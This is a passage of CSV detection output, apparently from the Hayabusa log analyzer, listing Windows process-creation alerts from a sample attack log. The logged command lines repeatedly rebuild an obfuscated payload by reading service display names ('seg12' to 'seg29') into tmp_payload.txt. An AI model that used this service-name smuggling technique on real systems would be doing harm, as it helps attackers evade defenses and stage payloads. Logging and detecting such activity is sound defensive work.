+00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:44.108 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:44.108 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:44.108 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:45.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:45.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:45.565 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:47.024 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:47.024 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:47.024 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:48.467 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:48.482 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:48.482 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:49.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:49.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:49.925 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:51.386 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:51.386 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:51.386 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:52.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:52.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:52.834 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:54.271 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:54.287 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:54.287 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:55.740 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:55.740 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:55.740 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:57.207 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:57.207 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:57.207 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:58.654 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:58.654 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:34:58.654 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:00.089 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:00.104 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:00.104 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:01.557 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:01.557 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:01.557 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:03.010 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:03.026 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:03.026 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:04.458 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:04.458 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:04.458 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:05.896 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:05.911 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:05.911 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:07.342 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:07.342 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:07.342 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:08.797 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:08.797 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:08.797 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:10.236 